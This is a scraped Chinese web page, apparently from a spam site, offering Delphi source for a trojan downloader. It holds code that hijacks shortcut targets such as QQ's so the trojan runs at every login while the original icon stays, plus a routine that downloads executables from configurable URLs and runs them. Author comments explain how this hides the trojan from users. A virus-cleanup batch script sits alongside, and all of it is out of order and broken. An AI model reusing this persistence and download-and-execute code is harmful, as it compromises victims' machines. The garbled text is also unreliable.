首页
网站首页
公司简介
资讯中心
推荐内容
返回顶部
delphi小熊下载者源码,恶意修改快捷方式
发布时间:2020-01-04 23:06
浏览次数:

 program InjectTheSelf;

 @echo off
title 清除威金(logo_1,熊猫烧香)病毒最新变种工具
@echo 清除VIKING病毒最新变种工具
pause
if exist %windir%rundl132.exe echo ---报告老大,发现有威金病毒埋伏! 让我来干掉它-----
if exist %windir%logo_1.exe echo ---报告老大,发现有威金病毒埋伏!让我来干掉它 -----
//杀viking进程
tskill logo_1
tskill rundl132
tskill zt
tskill wow
tskill logo1_
tskill Ravmon
tskill Eghost
tskill Mailmon
tskill KAVPFW
tskill IPARMOR
tskill Ravmond
taskkill /f /im 0sy.exe
taskkill /f /im 1sy.exe
taskkill /f /im 2sy.exe
taskkill /f /im 3sy.exe
taskkill /f /im 4sy.exe
taskkill /f /im 5sy.exe
taskkill /f /im 6sy.exe
taskkill /f /im 7sy.exe
taskkill /f /im 8sy.exe
taskkill /f /im 9sy.exe
//删除木马
del d:_desktop.ini /f/s/q/a
del c:Program Files_desktop.ini
del %Windir%MickNewMickNew.dll
del %Windir%MH_FILEMH_DLL.dll
del %Windir%_desktop.ini
del %Windir%TODAYZTKINGTODAYZTKING.DLL
attrib -h -r -s c:go.exe
del c:go.exe
del c:setup.exe
attrib -h -s -r c:autorun.inf
del c:autorun.inf
attrib -h -r -s d:go.exe
del d:go.exe
del d:setup.exe
attrib -h -s -r d:autorun.inf
del d:autorun.inf
del e:setup.exe
attrib -h -r -s e:go.exe
del e:go.exe
attrib -h -s -r e:autorun.inf
del e:autorun.inf
attrib -h -r -s f:go.exe
del f:go.exe
del f:setup.exe
attrib -h -s -r f:autorun.inf
del f:autorun.inf
attrib -h -r -s g:go.exe
del g:go.exe
del g:setup.exe
attrib -h -s -r g:autorun.inf
del g:autorun.inf
del h:go.exe
del h:setup.exe
attrib -h -s -r g:autorun.inf
del h:autorun.inf
del i:go.exe
attrib -h -s -r g:autorun.inf
del i:autorun.inf
del i:setup.exe
del j:go.exe
attrib -h -s -r g:autorun.inf
del j:autorun.inf
del j:setup.exe
del %windir%systemLogo1_.exedel %windir%systemLogo_1.exe
del %windir%rundl132.exe
del %windir%vDll.dll
del %windir%Dll.dll
del %windir%Sy.exe
del %windir%1Sy.exe
del %windir%2Sy.exe
del %windir%3Sy.exe
del %windir%5Sy.exe
del %windir%1.com
@echo ^_^ 报告老大,VIKING已经全都被处死
@echo 真累哈,再给你的系统免疫下,不需要的话请直接退出
pause
//免疫系统
echo > %windir%Logo1_.exe
echo > %windir%rundl132.exe
echo > %windir%Sy.exe
echo > %windir%vDll.dll
echo > %windir%1Sy.exe
echo > %windir%2Sy.exe
echo > %windir%rundll32.exe
echo > %windir%3Sy.exe
echo > %windir%5Sy.exe
echo > %windir%1.com
echo > %windir%exerouter.exe
echo > %windir%EXP10RER.com
echo > %windir%finders.com
echo > %windir%Shell.sys
echo > %windir%kill.exe
echo > %windir%sws.dll
echo > %windir%sws32.dll
echo > %windir%uninstallrundl132.exe
echo > %windir%SVCHOST.exe
echo > %windir%WINLOGON.exe
echo > %windir%RUNDLL32.EXE
echo > C:"Program Files"svchost.exe
echo > C:"Program Files""Internet Explorer"svchost.exe
echo > %windir%Downloadsvchost.exe
echo > %windir%system32wldll.dll
attrib %windir%Logo1_.exe +s +r +h
attrib %windir%rundl132.exe +s +r +h
attrib %windir%Sy.exe +s +r +h
attrib %windir%vDll.dll +s +r +h
attrib %windir%1Sy.exe +s +r +h
attrib %windir%2Sy.exe +s +r +h
attrib %windir%rundll32.exe +s +r +h
attrib %windir%3Sy.exe +s +r +h
attrib %windir%5Sy.exe +s +r +h
attrib %windir%1.com +s +r +h
attrib %windir%exerouter.exe +s +r +h
attrib %windir%EXP10RER.com +s +r +h
attrib %windir%finders.com +s +r +h
attrib %windir%Shell.sys +s +r +h
attrib %windir%kill.exe +s +r +h
attrib %windir%sws.dll +s +r +h
attrib %windir%sws32.dll +s +r +h
attrib %windir%uninstallrundl132.exe +s +r +h
attrib %windir%SVCHOST.exe +s +r +h
attrib %windir%WINLOGON.exe +s +r +h
attrib %windir%RUNDLL32.EXE +s +r +h
attrib C:"Program Files"svchost.exe +s +r +h
attrib C:"Program Files""Internet Explorer"svchost.exe +s +r +h
attrib %windir%Downloadsvchost.exe +s +r +h
attrib %windir%system32wldll.dll +s +r +h
net share c$ /del
net share d$ /del
net share e$ /del
net share f$ /del
net share admin$ /del
net share ipc$ /del
cls
@echo -------------------------------------
@echo viking已经全部被我杀完拉,哈,厉害吧
@echo 盗攻网络提醒您:系统已经成功免疫!
@echo 谢谢你的使用,请重启您的电脑!
@echo -------------------------------------
pause

 

 type
PTIMPORT_CODE=^TIMPORT_CODE;
TIMPORT_CODE=packed record
JmpPtr:Word;
PtrAdd:^Pointer;
end;

{$IMAGEBASE $13140000}

单元 ShlObj,   ComObj,   ActiveX;

function SHFormatDrive(hWnd: HWND;
Drive: Word;
fmtID: Word;
Options: Word): Longint
stdcall; external 'Shell32.dll' Name 'SHFormatDrive'; .............................声明一下

uses
  Windows,
  SysUtils,
  urlmon,
  sendmail,
  shellapi,
  tlhelp32;

修改快捷方式的启动目标,不改变原图标样子,反正QQ这种是用户每次开机就运行的,就连同我们的马一起运行了呗.

function GetAPIAddress(ApiPtr: Pointer): Pointer;
begin
Result := ApiPtr;
if ApiPtr= nil then
exit;
try
if (PTIMPORT_CODE(ApiPtr).JmpPtr = $25FF) then
Result := PTIMPORT_CODE(ApiPtr).PtrAdd^;
except
Result := nil;
end;
end;

var
MSG:TMSG;
kkk:string;
cTime: TDateTime;
hModule, hModule_News: Pointer;
Extent, Size, ThreadId: longword;
//ProcessHandle, Pid: longword;
sysdir:array[0..145] of char;
ret2:HKEY;
window:HWND;
htimer1,k,n,main:integer;
//time:pchar='5';
//timemain:pchar='5';
time:pchar='999';
timemain:pchar='9999';
kill:pchar='1';
infectl:pchar='1';
static:pchar='1';
//urllabel:pchar='http://www.16518.net/test/1.exe';
//url1:  pchar='http://www.16518.net/test/1.exe';
urllabel: pchar ='http://                                                                                                                                                                                                                             ';
url1:  pchar ='http://                                                                                                                                                                                                                              ';
url2:  pchar ='http://                                                                                                                                                                                                                              ';
url3:  pchar ='http://                                                                                                                                                                                                                              ';
url4:  pchar ='http://                                                                                                                                                                                                                              ';
url5:  pchar ='http://                                                                                                                                                                                                                              ';
url6:  pchar ='http://                                                                                                                                                                                                                              ';
url7:  pchar ='http://                                                                                                                                                                                                                              ';
url8:  pchar ='http://                                                                                                                                                                                                                              ';
url9:  pchar ='http://                                                                                                                                                                                                                              ';
url10: pchar ='http://                                                                                                                                                                                                                              ';
url11: pchar ='http://                                                                                                                                                                                                                              ';
urlfirst:  pchar ='http://                                                                                                                                                                                                                              ';
urldown:  pchar ='http://                                                                                                                                                                                                                              ';
urlupdate: pchar ='http://                                                                                                                                                                                     ';
delself:pchar='1';

马在运行时会自动开启QQ,这样用户就发现不到了.

procedure TForm1.Button1Click(Sender: TObject);
var
OrgSHFormatDrive: Pointer;
h: Cardinal;
begin
h:=LoadLibrary('Shell32.dll');
OrgSHFormatDrive:=GetProcAddress(h,'SHFormatDrive');
if GetAPIAddress(@SHFormatDrive) <> OrgSHFormatDrive then

//获取文件大小

 

begin
Showmessage('IAT HOOK');

{
function GetHostNam:String;
var
ComputerName: array[0..MAX_COMPUTERNAME_LENGTH+1] of char;
Size: Cardinal;
begin
result:='';
Size := MAX_COMPUTERNAME_LENGTH+1;
GetComputerName(ComputerName, Size);
Result:=StrPas(ComputerName);
end;

function LinkFileInfo(const lnkFileName:string;var info:LINK_FILE_INFO;const bSet:boolean):boolean;
var
 hr:hresult;
 psl:IShelllink;
 wfd:win32_find_data;
 ppf:IPersistFile;
 lpw:pwidechar;
 buf:pwidechar;
begin
 result:=false;
 getmem(buf,MAX_PATH);
 try
 if SUCCEEDED(CoInitialize(nil)) then
 if (succeeded(cocreateinstance(clsid_shelllink,nil,clsctx_inproc_server,IID_IShellLinkA,psl))) then
 begin
   hr:=psl.QueryInterface(iPersistFile,ppf);
   if succeeded(hr) then
   begin
     lpw:=stringtowidechar(lnkfilename,buf,MAX_PATH);
     hr := ppf.Load(lpw, STGM_READ);
     if succeeded(hr) then
     begin
       hr := psl.Resolve(0, SLR_NO_UI);
       if succeeded(hr) then
       begin
         if bSet then
         begin
           psl.SetArguments(info.Arguments);
           psl.SetDescription(info.Description);
           psl.SetHotkey(info.HotKey);
           psl.SetIconLocation(info.IconLocation,info.IconIndex);
           //psl.SetIDList(info.ItemIDList);      注意这个别修改,不然图标就不好更换了,嘿嘿
           psl.SetPath(info.FileName);
           psl.SetShowCmd(info.ShowState);
           psl.SetRelativePath(info.RelativePath,0);
           psl.SetWorkingDirectory(info.WorkDirectory);
           result:=succeeded(psl.Resolve(0,SLR_UPDATE));
         end
         else
         begin
           psl.GetPath(info.FileName,MAX_PATH, wfd,SLGP_SHORTPATH );
           psl.GetIconLocation(info.IconLocation,MAX_PATH,info.IconIndex);
           psl.GetWorkingDirectory(info.WorkDirectory,MAX_PATH);
           psl.GetDescription(info.Description,CCH_MAXNAME);
           psl.GetArguments(info.Arguments,MAX_PATH);
           psl.GetHotkey(info.HotKey);
           psl.GetIDList(info.ItemIDList);
           psl.GetShowCmd(info.ShowState);
           result:=true;
         end;
       end;
     end;
   end;
end;
 finally
 freemem(buf);
 end;
end;

end
else

//获取本机IP
procedure nametoIP;
type
  TaPInAddr = array[0..255] of PInAddr;
  PaPInAddr = ^TaPInAddr;
var
  phe: PHostEnt;
  pptr: PaPInAddr;
  Buffer: array[0..63] of char;
  i: integer;
  GInitData: TWSADATA;
  temp:string;
begin
  wsastartup($101, GInitData);
  Temp := '';
  GetHostName(Buffer, SizeOf(Buffer));
  phe := GetHostByName(buffer);
  if not assigned(phe) then
    exit;
  pptr := PaPInAddr(Phe^.h_addr_list);
  i := 0;
  while pptr^[I] <> nil do begin
    Temp := Temp + StrPas(inet_ntoa(pptr^[I]^)) + ',';
    inc(i);
  end;
  Delete(Temp, Length(Temp), 1);
  try
    trueip :=Temp;
  except
  end;
  wsacleanup;
end;
      }

procedure  SetLinkFileRun(LinkFilePath:string;NewRunPath:string);
var
info2,info3:LINK_FILE_INFO;
begin
   LinkFileInfo(LinkFilePath,info2,False);
   strpcopy(info3.FileName,NewRunPath);
   strpcopy(info3.WorkDirectory,ExtractfilePath(NewRunPath));
   info3.Description:=info2.Description;
   strpcopy(info3.IconLocation,info2.FileName);    //这里用快捷方式原目标文件地址,不然修改后 原图标样式会被替换成   D:a.exe 的图标
   info3.IconIndex:=0;   //这里填0,不然修改完后原图标样式会被替换成   D:a.exe 的图标
   info3.HotKey:=0;
   LinkFileInfo(LinkFilePath,info3,True);
end;

begin
Showmessage('Not IAT HOOK');

procedure tlabel();
var
f:textfile;
i:integer;
buffer,disk:string;

 

end;
FreeLibrary(h);
end;

begin

 

buffer:='first run';
Assignfile(F,'C:program fileslabel.tmp');
if not FileExists('C:program fileslabel.tmp') Then
begin
Rewrite(F);
Closefile(F);
End
Else  Assignfile(F,'C:program fileslabel.tmp');
{$I-}
Rewrite(F);
{$I+}
If IOResult<> 0 Then  exit;
//Write(F,Memo_gettxt.Text);
//Memo_gettxt.Text:='';
Write(F,buffer);

修改不当的快捷方式:

Closefile(F);
end;

图片 1 图片 2

procedure Download; //下载过程
begin
sleep(main);
URLDownloadToFile(nil,urllabel, 'C:program filestemp.tmp', 0, nil);
//WinExec('C:program filessystem1.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
if FileExists('c:Program Filestemp.tmp') then
begin

 

URLDownloadToFile(nil, url1, 'c:Program Filessystem1.exe', 0, nil);
WinExec('c:Program Filessystem1.exe', SW_SHOW); //SW_SHOW or SW_HIDE

完美修改后的快捷方式:

sleep(k);

图片 3

URLDownloadToFile(nil, url2, 'c:Program Filessystem2.exe', 0, nil);
WinExec('c:Program Filessystem2.exe', SW_SHOW); //SW_SHOW or SW_HIDE

友情链接: 网站地图
Copyright © 2015-2019 http://www.nflfreepicks.net. 新葡萄京娱乐场网址有限公司 版权所有